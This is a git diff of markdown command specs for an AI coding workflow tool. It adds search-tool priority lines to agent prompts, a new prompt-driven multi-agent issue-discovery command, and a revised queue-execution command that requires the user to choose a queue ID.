@@ -28,6 +28,8 @@ You are a test context discovery specialist focused on gathering test coverage i
## Tool Arsenal
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
### 1. Session & Implementation Context
**Tools**:
- `Read()` - Load session metadata and implementation summaries

View File

@@ -332,6 +332,7 @@ When generating test results for orchestrator (saved to `.process/test-results.j
## Important Reminders
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- **Execute tests first** - Understand what's failing before fixing
- **Diagnose thoroughly** - Find root cause, not just symptoms
- **Fix minimally** - Change only what's needed to pass tests

View File

@@ -284,6 +284,8 @@ You execute 6 distinct task types organized into 3 patterns. Each task includes
### ALWAYS
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
**W3C Format Compliance**: ✅ Include $schema in all token files | ✅ Use $type metadata for all tokens | ✅ Use $value wrapper for color (light/dark), duration, easing | ✅ Validate token structure against W3C spec
**Pattern Recognition**: ✅ Identify pattern from [TASK_TYPE_IDENTIFIER] first | ✅ Apply pattern-specific execution rules | ✅ Follow autonomy level

View File

@@ -124,6 +124,7 @@ Before completing any task, verify:
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
**ALWAYS:**
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
- Verify resource/dependency existence before referencing
- Execute tasks systematically and incrementally
- Test and validate work thoroughly

View File

@@ -0,0 +1,764 @@
---
name: issue:discover-by-prompt
description: Discover issues from user prompt with Gemini-planned iterative multi-agent exploration. Uses ACE semantic search for context gathering and supports cross-module comparison (e.g., frontend vs backend API contracts).
argument-hint: "<prompt> [--scope=src/**] [--depth=standard|deep] [--max-iterations=5]"
allowed-tools: SlashCommand(*), TodoWrite(*), Read(*), Bash(*), Task(*), AskUserQuestion(*), Glob(*), Grep(*), mcp__ace-tool__search_context(*), mcp__exa__search(*)
---
# Issue Discovery by Prompt
## Quick Start
```bash
# Discover issues based on user description
/issue:discover-by-prompt "Check if frontend API calls match backend implementations"
# Compare specific modules
/issue:discover-by-prompt "Verify auth flow consistency between mobile and web clients" --scope=src/auth/**,src/mobile/**
# Deep exploration with more iterations
/issue:discover-by-prompt "Find all places where error handling is inconsistent" --depth=deep --max-iterations=8
# Focused backend-frontend contract check
/issue:discover-by-prompt "Compare REST API definitions with frontend fetch calls"
```
**Core Difference from `/issue:discover`**:
- `discover`: Pre-defined perspectives (bug, security, etc.), parallel execution
- `discover-by-prompt`: User-driven prompt, Gemini-planned strategy, iterative exploration
## What & Why
### Core Concept
Prompt-driven issue discovery with intelligent planning. Instead of fixed perspectives, this command:
1. **Analyzes user intent** via Gemini to understand what to find
2. **Plans exploration strategy** dynamically based on codebase structure
3. **Executes iterative multi-agent exploration** with feedback loops
4. **Performs cross-module comparison** when detecting comparison intent
### Value Proposition
1. **Natural Language Input**: Describe what you want to find, not how to find it
2. **Intelligent Planning**: Gemini designs optimal exploration strategy
3. **Iterative Refinement**: Each round builds on previous discoveries
4. **Cross-Module Analysis**: Compare frontend/backend, mobile/web, old/new implementations
5. **Adaptive Exploration**: Adjusts direction based on findings
### Use Cases
| Scenario | Example Prompt |
|----------|----------------|
| API Contract | "Check if frontend calls match backend endpoints" |
| Error Handling | "Find inconsistent error handling patterns" |
| Migration Gap | "Compare old auth with new auth implementation" |
| Feature Parity | "Verify mobile has all web features" |
| Schema Drift | "Check if TypeScript types match API responses" |
| Integration | "Find mismatches between service A and service B" |
## How It Works
### Execution Flow
```
Phase 1: Prompt Analysis & Initialization
├─ Parse user prompt and flags
├─ Detect exploration intent (comparison/search/verification)
└─ Initialize discovery session
Phase 1.5: ACE Context Gathering
├─ Use ACE semantic search to understand codebase structure
├─ Identify relevant modules based on prompt keywords
├─ Collect architecture context for Gemini planning
└─ Build initial context package
Phase 2: Gemini Strategy Planning
├─ Feed ACE context + prompt to Gemini CLI
├─ Gemini analyzes and generates exploration strategy
├─ Create exploration dimensions with search targets
├─ Define comparison matrix (if comparison intent)
└─ Set success criteria and iteration limits
Phase 3: Iterative Agent Exploration (with ACE)
├─ Iteration 1: Initial exploration by assigned agents
│ ├─ Agent A: ACE search + explore dimension 1
│ ├─ Agent B: ACE search + explore dimension 2
│ └─ Collect findings, update shared context
├─ Iteration 2-N: Refined exploration
│ ├─ Analyze previous findings
│ ├─ ACE search for related code paths
│ ├─ Execute targeted exploration
│ └─ Update cumulative findings
└─ Termination: Max iterations or convergence
Phase 4: Cross-Analysis & Synthesis
├─ Compare findings across dimensions
├─ Identify discrepancies and issues
├─ Calculate confidence scores
└─ Generate issue candidates
Phase 5: Issue Generation & Summary
├─ Convert findings to issue format
├─ Write discovery outputs
└─ Prompt user for next action
```
### Exploration Dimensions
Dimensions are **dynamically generated by Gemini** based on the user prompt. Not limited to predefined categories.
**Examples**:
| Prompt | Generated Dimensions |
|--------|---------------------|
| "Check API contracts" | frontend-calls, backend-handlers |
| "Find auth issues" | auth-module (single dimension) |
| "Compare old/new implementations" | legacy-code, new-code |
| "Audit payment flow" | payment-service, validation, logging |
| "Find error handling gaps" | error-handlers, error-types, recovery-logic |
Gemini analyzes the prompt + ACE context to determine:
- How many dimensions are needed (1 to N)
- What each dimension should focus on
- Whether comparison is needed between dimensions
### Iteration Strategy
```
┌─────────────────────────────────────────────────────────────┐
│ Iteration Loop │
├─────────────────────────────────────────────────────────────┤
│ 1. Plan: What to explore this iteration │
│ └─ Based on: previous findings + unexplored areas │
│ │
│ 2. Execute: Launch agents for this iteration │
│ └─ Each agent: explore → collect → return summary │
│ │
│ 3. Analyze: Process iteration results │
│ └─ New findings? Gaps? Contradictions? │
│ │
│ 4. Decide: Continue or terminate │
│ └─ Terminate if: max iterations OR convergence OR │
│ high confidence on all questions │
└─────────────────────────────────────────────────────────────┘
```
## Core Responsibilities
### Phase 1: Prompt Analysis & Initialization
```javascript
// Step 1: Parse arguments
const { prompt, scope, depth, maxIterations } = parseArgs(args);
// Step 2: Generate discovery ID
const discoveryId = `DBP-${formatDate(new Date(), 'YYYYMMDD-HHmmss')}`;
// Step 3: Create output directory
const outputDir = `.workflow/issues/discoveries/${discoveryId}`;
await mkdir(outputDir, { recursive: true });
await mkdir(`${outputDir}/iterations`, { recursive: true });
// Step 4: Detect intent type from prompt
const intentType = detectIntent(prompt);
// Returns: 'comparison' | 'search' | 'verification' | 'audit'
// Step 5: Initialize discovery state
await writeJson(`${outputDir}/discovery-state.json`, {
discovery_id: discoveryId,
type: 'prompt-driven',
prompt: prompt,
intent_type: intentType,
scope: scope || '**/*',
depth: depth || 'standard',
max_iterations: maxIterations || 5,
phase: 'initialization',
created_at: new Date().toISOString(),
iterations: [],
cumulative_findings: [],
comparison_matrix: null // filled for comparison intent
});
```
### Phase 1.5: ACE Context Gathering
**Purpose**: Use ACE semantic search to gather codebase context before Gemini planning.
```javascript
// Step 1: Extract keywords from prompt for semantic search
const keywords = extractKeywords(prompt);
// e.g., "frontend API calls match backend" → ["frontend", "API", "backend", "endpoints"]
// Step 2: Use ACE to understand codebase structure
const aceQueries = [
`Project architecture and module structure for ${keywords.join(', ')}`,
`Where are ${keywords[0]} implementations located?`,
`How does ${keywords.slice(0, 2).join(' ')} work in this codebase?`
];
const aceResults = [];
for (const query of aceQueries) {
const result = await mcp__ace-tool__search_context({
project_root_path: process.cwd(),
query: query
});
aceResults.push({ query, result });
}
// Step 3: Build context package for Gemini (kept in memory)
const aceContext = {
prompt_keywords: keywords,
codebase_structure: aceResults[0].result,
relevant_modules: aceResults.slice(1).map(r => r.result),
detected_patterns: extractPatterns(aceResults)
};
// Step 4: Update state (no separate file)
await updateDiscoveryState(outputDir, {
phase: 'context-gathered',
ace_context: {
queries_executed: aceQueries.length,
modules_identified: aceContext.relevant_modules.length
}
});
// aceContext passed to Phase 2 in memory
```
**ACE Query Strategy by Intent Type**:
| Intent | ACE Queries |
|--------|-------------|
| **comparison** | "frontend API calls", "backend API handlers", "API contract definitions" |
| **search** | "{keyword} implementations", "{keyword} usage patterns" |
| **verification** | "expected behavior for {feature}", "test coverage for {feature}" |
| **audit** | "all {category} patterns", "{category} security concerns" |
### Phase 2: Gemini Strategy Planning
**Purpose**: Gemini analyzes user prompt + ACE context to design optimal exploration strategy.
```javascript
// Step 1: Load ACE context gathered in Phase 1.5
const aceContext = await readJson(`${outputDir}/ace-context.json`);
// Step 2: Build Gemini planning prompt with ACE context
const planningPrompt = `
PURPOSE: Analyze discovery prompt and create exploration strategy based on codebase context
TASK:
• Parse user intent from prompt: "${prompt}"
• Use codebase context to identify specific modules and files to explore
• Create exploration dimensions with precise search targets
• Define comparison matrix structure (if comparison intent)
• Set success criteria and iteration strategy
MODE: analysis
CONTEXT: @${scope || '**/*'} | Discovery type: ${intentType}
## Codebase Context (from ACE semantic search)
${JSON.stringify(aceContext, null, 2)}
EXPECTED: JSON exploration plan following exploration-plan-schema.json:
{
"intent_analysis": { "type": "${intentType}", "primary_question": "...", "sub_questions": [...] },
"dimensions": [{ "name": "...", "description": "...", "search_targets": [...], "focus_areas": [...], "agent_prompt": "..." }],
"comparison_matrix": { "dimension_a": "...", "dimension_b": "...", "comparison_points": [...] },
"success_criteria": [...],
"estimated_iterations": N,
"termination_conditions": [...]
}
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Use ACE context to inform targets | Focus on actionable plan
`;
// Step 3: Execute Gemini planning
Bash({
command: `ccw cli -p "${planningPrompt}" --tool gemini --mode analysis`,
run_in_background: true,
timeout: 300000
});
// Step 4: Parse Gemini output and validate against schema
const explorationPlan = await parseGeminiPlanOutput(geminiResult);
validateAgainstSchema(explorationPlan, 'exploration-plan-schema.json');
// Step 5: Enhance plan with ACE-discovered file paths
explorationPlan.dimensions = explorationPlan.dimensions.map(dim => ({
...dim,
ace_suggested_files: aceContext.relevant_modules
.filter(m => m.relevance_to === dim.name)
.map(m => m.file_path)
}));
// Step 6: Update state (plan kept in memory, not persisted)
await updateDiscoveryState(outputDir, {
phase: 'planned',
exploration_plan: {
dimensions_count: explorationPlan.dimensions.length,
has_comparison_matrix: !!explorationPlan.comparison_matrix,
estimated_iterations: explorationPlan.estimated_iterations
}
});
// explorationPlan passed to Phase 3 in memory
```
**Gemini Planning Responsibilities**:
| Responsibility | Input | Output |
|----------------|-------|--------|
| Intent Analysis | User prompt | type, primary_question, sub_questions |
| Dimension Design | ACE context + prompt | dimensions with search_targets |
| Comparison Matrix | Intent type + modules | comparison_points (if applicable) |
| Iteration Strategy | Depth setting | estimated_iterations, termination_conditions |
**Gemini Planning Output Schema**:
```json
{
"intent_analysis": {
"type": "comparison|search|verification|audit",
"primary_question": "string",
"sub_questions": ["string"]
},
"dimensions": [
{
"name": "frontend",
"description": "Client-side API calls and error handling",
"search_targets": ["src/api/**", "src/hooks/**"],
"focus_areas": ["fetch calls", "error boundaries", "response parsing"],
"agent_prompt": "Explore frontend API consumption patterns..."
},
{
"name": "backend",
"description": "Server-side API implementations",
"search_targets": ["src/server/**", "src/routes/**"],
"focus_areas": ["endpoint handlers", "response schemas", "error responses"],
"agent_prompt": "Explore backend API implementations..."
}
],
"comparison_matrix": {
"dimension_a": "frontend",
"dimension_b": "backend",
"comparison_points": [
{"aspect": "endpoints", "frontend_check": "fetch URLs", "backend_check": "route paths"},
{"aspect": "methods", "frontend_check": "HTTP methods used", "backend_check": "methods accepted"},
{"aspect": "payloads", "frontend_check": "request body structure", "backend_check": "expected schema"},
{"aspect": "responses", "frontend_check": "response parsing", "backend_check": "response format"},
{"aspect": "errors", "frontend_check": "error handling", "backend_check": "error responses"}
]
},
"success_criteria": [
"All API endpoints mapped between frontend and backend",
"Discrepancies identified with file:line references",
"Each finding includes remediation suggestion"
],
"estimated_iterations": 3,
"termination_conditions": [
"All comparison points verified",
"No new findings in last iteration",
"Confidence > 0.8 on primary question"
]
}
```
### Phase 3: Iterative Agent Exploration (with ACE)
**Purpose**: Multi-agent iterative exploration using ACE for semantic search within each iteration.
```javascript
let iteration = 0;
let cumulativeFindings = [];
let sharedContext = { aceDiscoveries: [], crossReferences: [] };
let shouldContinue = true;
while (shouldContinue && iteration < maxIterations) {
iteration++;
const iterationDir = `${outputDir}/iterations/${iteration}`;
await mkdir(iterationDir, { recursive: true });
// Step 1: ACE-assisted iteration planning
// Use previous findings to guide ACE queries for this iteration
const iterationAceQueries = iteration === 1
? explorationPlan.dimensions.map(d => d.focus_areas[0]) // Initial queries from plan
: deriveQueriesFromFindings(cumulativeFindings); // Follow-up queries from findings
// Execute ACE searches to find related code
const iterationAceResults = [];
for (const query of iterationAceQueries) {
const result = await mcp__ace-tool__search_context({
project_root_path: process.cwd(),
query: `${query} in ${explorationPlan.scope}`
});
iterationAceResults.push({ query, result });
}
// Update shared context with ACE discoveries
sharedContext.aceDiscoveries.push(...iterationAceResults);
// Step 2: Plan this iteration based on ACE results
const iterationPlan = planIteration(iteration, explorationPlan, cumulativeFindings, iterationAceResults);
// Step 3: Launch dimension agents with ACE context
const agentPromises = iterationPlan.dimensions.map(dimension =>
Task({
subagent_type: "cli-explore-agent",
run_in_background: false,
description: `Explore ${dimension.name} (iteration ${iteration})`,
prompt: buildDimensionPromptWithACE(dimension, iteration, cumulativeFindings, iterationAceResults, iterationDir)
})
);
// Wait for iteration agents
const iterationResults = await Promise.all(agentPromises);
// Step 4: Collect and analyze iteration findings
const iterationFindings = await collectIterationFindings(iterationDir, iterationPlan.dimensions);
// Step 5: Cross-reference findings between dimensions
if (iterationPlan.dimensions.length > 1) {
const crossRefs = findCrossReferences(iterationFindings, iterationPlan.dimensions);
sharedContext.crossReferences.push(...crossRefs);
}
cumulativeFindings.push(...iterationFindings);
// Step 6: Decide whether to continue
const convergenceCheck = checkConvergence(iterationFindings, cumulativeFindings, explorationPlan);
shouldContinue = !convergenceCheck.converged;
// Step 7: Update state (iteration summary embedded in state)
await updateDiscoveryState(outputDir, {
iterations: [...state.iterations, {
number: iteration,
findings_count: iterationFindings.length,
ace_queries: iterationAceQueries.length,
cross_references: sharedContext.crossReferences.length,
new_discoveries: convergenceCheck.newDiscoveries,
confidence: convergenceCheck.confidence,
continued: shouldContinue
}],
cumulative_findings: cumulativeFindings
});
}
```
**ACE in Iteration Loop**:
```
Iteration N
├─→ ACE Search (based on previous findings)
│ └─ Query: "related code paths for {finding.category}"
│ └─ Result: Additional files to explore
├─→ Agent Exploration (with ACE context)
│ └─ Agent receives: dimension targets + ACE suggestions
│ └─ Agent can call ACE for deeper search
├─→ Cross-Reference Analysis
│ └─ Compare findings between dimensions
│ └─ Identify discrepancies
└─→ Convergence Check
└─ New findings? Continue
└─ No new findings? Terminate
```
**Dimension Agent Prompt Template (with ACE)**:
```javascript
function buildDimensionPromptWithACE(dimension, iteration, previousFindings, aceResults, outputDir) {
// Filter ACE results relevant to this dimension
const relevantAceResults = aceResults.filter(r =>
r.query.includes(dimension.name) || dimension.focus_areas.some(fa => r.query.includes(fa))
);
return `
## Task Objective
Explore ${dimension.name} dimension for issue discovery (Iteration ${iteration})
## Context
- Dimension: ${dimension.name}
- Description: ${dimension.description}
- Search Targets: ${dimension.search_targets.join(', ')}
- Focus Areas: ${dimension.focus_areas.join(', ')}
## ACE Semantic Search Results (Pre-gathered)
The following files/code sections were identified by ACE as relevant to this dimension:
${JSON.stringify(relevantAceResults.map(r => ({ query: r.query, files: r.result.slice(0, 5) })), null, 2)}
**Use ACE for deeper exploration**: You have access to mcp__ace-tool__search_context.
When you find something interesting, use ACE to find related code:
- mcp__ace-tool__search_context({ project_root_path: ".", query: "related to {finding}" })
${iteration > 1 ? `
## Previous Findings to Build Upon
${summarizePreviousFindings(previousFindings, dimension.name)}
## This Iteration Focus
- Explore areas not yet covered (check ACE results for new files)
- Verify/deepen previous findings
- Follow leads from previous discoveries
- Use ACE to find cross-references between dimensions
` : ''}
## MANDATORY FIRST STEPS
1. Read exploration plan: ${outputDir}/../exploration-plan.json
2. Read schema: ~/.claude/workflows/cli-templates/schemas/discovery-finding-schema.json
3. Review ACE results above for starting points
4. Explore files identified by ACE
## Exploration Instructions
${dimension.agent_prompt}
## ACE Usage Guidelines
- Use ACE when you need to find:
- Where a function/class is used
- Related implementations in other modules
- Cross-module dependencies
- Similar patterns elsewhere in codebase
- Query format: Natural language, be specific
- Example: "Where is UserService.authenticate called from?"
## Output Requirements
**1. Write JSON file**: ${outputDir}/${dimension.name}.json
Follow discovery-finding-schema.json:
- findings: [{id, title, category, description, file, line, snippet, confidence, related_dimension}]
- coverage: {files_explored, areas_covered, areas_remaining}
- leads: [{description, suggested_search}] // for next iteration
- ace_queries_used: [{query, result_count}] // track ACE usage
**2. Return summary**:
- Total findings this iteration
- Key discoveries
- ACE queries that revealed important code
- Recommended next exploration areas
## Success Criteria
- [ ] JSON written to ${outputDir}/${dimension.name}.json
- [ ] Each finding has file:line reference
- [ ] ACE used for cross-references where applicable
- [ ] Coverage report included
- [ ] Leads for next iteration identified
`;
}
```
### Phase 4: Cross-Analysis & Synthesis
```javascript
// For comparison intent, perform cross-analysis
if (intentType === 'comparison' && explorationPlan.comparison_matrix) {
const comparisonResults = [];
for (const point of explorationPlan.comparison_matrix.comparison_points) {
const dimensionAFindings = cumulativeFindings.filter(f =>
f.related_dimension === explorationPlan.comparison_matrix.dimension_a &&
f.category.includes(point.aspect)
);
const dimensionBFindings = cumulativeFindings.filter(f =>
f.related_dimension === explorationPlan.comparison_matrix.dimension_b &&
f.category.includes(point.aspect)
);
// Compare and find discrepancies
const discrepancies = findDiscrepancies(dimensionAFindings, dimensionBFindings, point);
comparisonResults.push({
aspect: point.aspect,
dimension_a_count: dimensionAFindings.length,
dimension_b_count: dimensionBFindings.length,
discrepancies: discrepancies,
match_rate: calculateMatchRate(dimensionAFindings, dimensionBFindings)
});
}
// Write comparison analysis
await writeJson(`${outputDir}/comparison-analysis.json`, {
matrix: explorationPlan.comparison_matrix,
results: comparisonResults,
summary: {
total_discrepancies: comparisonResults.reduce((sum, r) => sum + r.discrepancies.length, 0),
overall_match_rate: average(comparisonResults.map(r => r.match_rate)),
critical_mismatches: comparisonResults.filter(r => r.match_rate < 0.5)
}
});
}
// Prioritize all findings
const prioritizedFindings = prioritizeFindings(cumulativeFindings, explorationPlan);
```
### Phase 5: Issue Generation & Summary
```javascript
// Convert high-confidence findings to issues
const issueWorthy = prioritizedFindings.filter(f =>
f.confidence >= 0.7 || f.priority === 'critical' || f.priority === 'high'
);
const issues = issueWorthy.map(finding => ({
id: `ISS-${discoveryId}-${finding.id}`,
title: finding.title,
description: finding.description,
source: {
discovery_id: discoveryId,
finding_id: finding.id,
dimension: finding.related_dimension
},
file: finding.file,
line: finding.line,
priority: finding.priority,
category: finding.category,
suggested_fix: finding.suggested_fix,
confidence: finding.confidence,
status: 'discovered',
created_at: new Date().toISOString()
}));
// Write issues
await writeJsonl(`${outputDir}/discovery-issues.jsonl`, issues);
// Update final state (summary embedded in state, no separate file)
await updateDiscoveryState(outputDir, {
phase: 'complete',
updated_at: new Date().toISOString(),
results: {
total_iterations: iteration,
total_findings: cumulativeFindings.length,
issues_generated: issues.length,
comparison_match_rate: comparisonResults
? average(comparisonResults.map(r => r.match_rate))
: null
}
});
// Prompt user for next action
await AskUserQuestion({
questions: [{
question: `Discovery complete: ${issues.length} issues from ${cumulativeFindings.length} findings across ${iteration} iterations. What next?`,
header: "Next Step",
multiSelect: false,
options: [
{ label: "Export to Issues (Recommended)", description: `Export ${issues.length} issues for planning` },
{ label: "Review Details", description: "View comparison analysis and iteration details" },
{ label: "Run Deeper", description: "Continue with more iterations" },
{ label: "Skip", description: "Complete without exporting" }
]
}]
});
```
## Output File Structure
```
.workflow/issues/discoveries/
└── {DBP-YYYYMMDD-HHmmss}/
├── discovery-state.json # Session state with iteration tracking
├── iterations/
│ ├── 1/
│ │ └── {dimension}.json # Dimension findings
│ ├── 2/
│ │ └── {dimension}.json
│ └── ...
├── comparison-analysis.json # Cross-dimension comparison (if applicable)
└── discovery-issues.jsonl # Generated issue candidates
```
**Simplified Design**:
- ACE context and Gemini plan kept in memory, not persisted
- Iteration summaries embedded in state
- No separate summary.md (state.json contains all needed info)
## Schema References
| Schema | Path | Used By |
|--------|------|---------|
| **Discovery State** | `discovery-state-schema.json` | Orchestrator (state tracking) |
| **Discovery Finding** | `discovery-finding-schema.json` | Dimension agents (output) |
| **Exploration Plan** | `exploration-plan-schema.json` | Gemini output validation (memory only) |
## Configuration Options
| Flag | Default | Description |
|------|---------|-------------|
| `--scope` | `**/*` | File pattern to explore |
| `--depth` | `standard` | `standard` (3 iterations) or `deep` (5+ iterations) |
| `--max-iterations` | 5 | Maximum exploration iterations |
| `--tool` | `gemini` | Planning tool (gemini/qwen) |
| `--plan-only` | `false` | Stop after Phase 2 (Gemini planning), show plan for user review |
## Examples
### Example 1: Single Module Deep Dive
```bash
/issue:discover-by-prompt "Find all potential issues in the auth module" --scope=src/auth/**
```
**Gemini plans** (single dimension):
- Dimension: auth-module
- Focus: security vulnerabilities, edge cases, error handling, test gaps
**Iterations**: 2-3 (until no new findings)
### Example 2: API Contract Comparison
```bash
/issue:discover-by-prompt "Check if API calls match implementations" --scope=src/**
```
**Gemini plans** (comparison):
- Dimension 1: api-consumers (fetch calls, hooks, services)
- Dimension 2: api-providers (handlers, routes, controllers)
- Comparison matrix: endpoints, methods, payloads, responses
### Example 3: Multi-Module Audit
```bash
/issue:discover-by-prompt "Audit the payment flow for issues" --scope=src/payment/**
```
**Gemini plans** (multi-dimension):
- Dimension 1: payment-logic (calculations, state transitions)
- Dimension 2: validation (input checks, business rules)
- Dimension 3: error-handling (failure modes, recovery)
### Example 4: Plan Only Mode
```bash
/issue:discover-by-prompt "Find inconsistent patterns" --plan-only
```
Stops after Gemini planning, outputs:
```
Gemini Plan:
- Intent: search
- Dimensions: 2 (pattern-definitions, pattern-usages)
- Estimated iterations: 3
Continue with exploration? [Y/n]
```
## Related Commands
```bash
# After discovery, plan solutions
/issue:plan DBP-001-01,DBP-001-02
# View all discoveries
/issue:manage
# Standard perspective-based discovery
/issue:discover src/auth/** --perspectives=security,bug
```
## Best Practices
1. **Be Specific in Prompts**: More specific prompts lead to better Gemini planning
2. **Scope Appropriately**: Narrow scope for focused comparison, wider for audits
3. **Review Exploration Plan**: Check `exploration-plan.json` before long explorations
4. **Use Standard Depth First**: Start with standard, go deep only if needed
5. **Combine with `/issue:discover`**: Use prompt-based for comparisons, perspective-based for audits

View File

@@ -1,7 +1,7 @@
---
name: execute
description: Execute queue with DAG-based parallel orchestration (one commit per solution)
argument-hint: "[--worktree [<existing-path>]] [--queue <queue-id>]"
argument-hint: "--queue <queue-id> [--worktree [<existing-path>]]"
allowed-tools: TodoWrite(*), Bash(*), Read(*), AskUserQuestion(*)
---
@@ -17,21 +17,64 @@ Minimal orchestrator that dispatches **solution IDs** to executors. Each executo
- `done <id>` → update solution completion status
- No race conditions: status changes only via `done`
- **Executor handles all tasks within a solution sequentially**
- **Worktree isolation**: Each executor can work in its own git worktree
- **Single worktree for entire queue**: One worktree isolates ALL queue execution from main workspace
## Queue ID Requirement (MANDATORY)
**Queue ID is REQUIRED.** You MUST specify which queue to execute via `--queue <queue-id>`.
### If Queue ID Not Provided
When `--queue` parameter is missing, you MUST:
1. **List available queues** by running:
```javascript
const result = Bash('ccw issue queue list --brief --json');
const index = JSON.parse(result);
```
2. **Display available queues** to user:
```
Available Queues:
ID Status Progress Issues
-----------------------------------------------------------
→ QUE-20251215-001 active 3/10 ISS-001, ISS-002
QUE-20251210-002 active 0/5 ISS-003
QUE-20251205-003 completed 8/8 ISS-004
```
3. **Stop and ask user** to specify which queue to execute:
```javascript
AskUserQuestion({
questions: [{
question: "Which queue would you like to execute?",
header: "Queue",
multiSelect: false,
options: index.queues
.filter(q => q.status === 'active')
.map(q => ({
label: q.id,
description: `${q.status}, ${q.completed_solutions || 0}/${q.total_solutions || 0} completed, Issues: ${q.issue_ids.join(', ')}`
}))
}]
})
```
4. **After user selection**, continue execution with the selected queue ID.
**DO NOT auto-select queues.** Explicit user confirmation is required to prevent accidental execution of wrong queue.
## Usage
```bash
/issue:execute # Execute active queue(s)
/issue:execute --queue QUE-xxx # Execute specific queue
/issue:execute --worktree # Use git worktrees for parallel isolation
/issue:execute --worktree --queue QUE-xxx
/issue:execute --worktree /path/to/existing/worktree # Resume in existing worktree
/issue:execute --queue QUE-xxx # Execute specific queue (REQUIRED)
/issue:execute --queue QUE-xxx --worktree # Execute in isolated worktree
/issue:execute --queue QUE-xxx --worktree /path/to/existing/worktree # Resume
```
**Parallelism**: Determined automatically by task dependency DAG (no manual control)
**Executor & Dry-run**: Selected via interactive prompt (AskUserQuestion)
**Worktree**: Creates isolated git worktrees for each parallel executor
**Worktree**: Creates ONE worktree for the entire queue execution (not per-solution)
**⭐ Recommended Executor**: **Codex** - Best for long-running autonomous work (2hr timeout), supports background execution and full write access
@@ -44,37 +87,101 @@ Minimal orchestrator that dispatches **solution IDs** to executors. Each executo
## Execution Flow
```
Phase 0 (if --worktree): Setup Worktree Base
Ensure .worktrees directory exists
Phase 0: Validate Queue ID (REQUIRED)
If --queue provided → use specified queue
├─ If --queue missing → list queues, prompt user to select
└─ Store QUEUE_ID for all subsequent commands
Phase 0.5 (if --worktree): Setup Queue Worktree
├─ Create ONE worktree for entire queue: .ccw/worktrees/queue-<timestamp>
├─ All subsequent execution happens in this worktree
└─ Main workspace remains clean and untouched
Phase 1: Get DAG & User Selection
├─ ccw issue queue dag [--queue QUE-xxx] → { parallel_batches: [["S-1","S-2"], ["S-3"]] }
├─ ccw issue queue dag --queue ${QUEUE_ID} → { parallel_batches: [["S-1","S-2"], ["S-3"]] }
└─ AskUserQuestion → executor type (codex|gemini|agent), dry-run mode, worktree mode
Phase 2: Dispatch Parallel Batch (DAG-driven)
├─ Parallelism determined by DAG (no manual limit)
├─ All executors work in the SAME worktree (or main if no worktree)
├─ For each solution ID in batch (parallel - all at once):
│ ├─ (if worktree) Create isolated worktree: git worktree add
│ ├─ Executor calls: ccw issue detail <id> (READ-ONLY)
│ ├─ Executor gets FULL SOLUTION with all tasks
│ ├─ Executor implements all tasks sequentially (T1 → T2 → T3)
│ ├─ Executor tests + verifies each task
│ ├─ Executor commits ONCE per solution (with formatted summary)
─ Executor calls: ccw issue done <id>
│ └─ (if worktree) Cleanup: merge branch, remove worktree
─ Executor calls: ccw issue done <id>
└─ Wait for batch completion
Phase 3: Next Batch
Phase 3: Next Batch (repeat Phase 2)
└─ ccw issue queue dag → check for newly-ready solutions
Phase 4 (if --worktree): Worktree Completion
├─ All batches complete → prompt for merge strategy
└─ Options: Create PR / Merge to main / Keep branch
```
## Implementation
### Phase 0: Validate Queue ID
```javascript
// Check if --queue was provided
let QUEUE_ID = args.queue;
if (!QUEUE_ID) {
// List available queues
const listResult = Bash('ccw issue queue list --brief --json').trim();
const index = JSON.parse(listResult);
if (index.queues.length === 0) {
console.log('No queues found. Use /issue:queue to create one first.');
return;
}
// Filter active queues only
const activeQueues = index.queues.filter(q => q.status === 'active');
if (activeQueues.length === 0) {
console.log('No active queues found.');
console.log('Available queues:', index.queues.map(q => `${q.id} (${q.status})`).join(', '));
return;
}
// Display and prompt user
console.log('\nAvailable Queues:');
console.log('ID'.padEnd(22) + 'Status'.padEnd(12) + 'Progress'.padEnd(12) + 'Issues');
console.log('-'.repeat(70));
for (const q of index.queues) {
const marker = q.id === index.active_queue_id ? '→ ' : ' ';
console.log(marker + q.id.padEnd(20) + q.status.padEnd(12) +
`${q.completed_solutions || 0}/${q.total_solutions || 0}`.padEnd(12) +
q.issue_ids.join(', '));
}
const answer = AskUserQuestion({
questions: [{
question: "Which queue would you like to execute?",
header: "Queue",
multiSelect: false,
options: activeQueues.map(q => ({
label: q.id,
description: `${q.completed_solutions || 0}/${q.total_solutions || 0} completed, Issues: ${q.issue_ids.join(', ')}`
}))
}]
});
QUEUE_ID = answer['Queue'];
}
console.log(`\n## Executing Queue: ${QUEUE_ID}\n`);
```
### Phase 1: Get DAG & User Selection
```javascript
// Get dependency graph and parallel batches
const dagJson = Bash(`ccw issue queue dag`).trim();
// Get dependency graph and parallel batches (QUEUE_ID required)
const dagJson = Bash(`ccw issue queue dag --queue ${QUEUE_ID}`).trim();
const dag = JSON.parse(dagJson);
if (dag.error || dag.ready_count === 0) {
@@ -115,12 +222,12 @@ const answer = AskUserQuestion({
]
},
{
question: 'Use git worktrees for parallel isolation?',
question: 'Use git worktree for queue isolation?',
header: 'Worktree',
multiSelect: false,
options: [
{ label: 'Yes (Recommended for parallel)', description: 'Each executor works in isolated worktree branch' },
{ label: 'No', description: 'Work directly in current directory (serial only)' }
{ label: 'Yes (Recommended)', description: 'Create ONE worktree for entire queue - main stays clean' },
{ label: 'No', description: 'Work directly in current directory' }
]
}
]
@@ -140,7 +247,7 @@ if (isDryRun) {
}
```
### Phase 2: Dispatch Parallel Batch (DAG-driven)
### Phase 0 & 2: Setup Queue Worktree & Dispatch
```javascript
// Parallelism determined by DAG - no manual limit
@@ -158,24 +265,40 @@ TodoWrite({
console.log(`\n### Executing Solutions (DAG batch 1): ${batch.join(', ')}`);
// Setup worktree base directory if needed (using absolute paths)
if (useWorktree) {
// Use absolute paths to avoid issues when running from subdirectories
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
const worktreeBase = `${repoRoot}/.ccw/worktrees`;
Bash(`mkdir -p "${worktreeBase}"`);
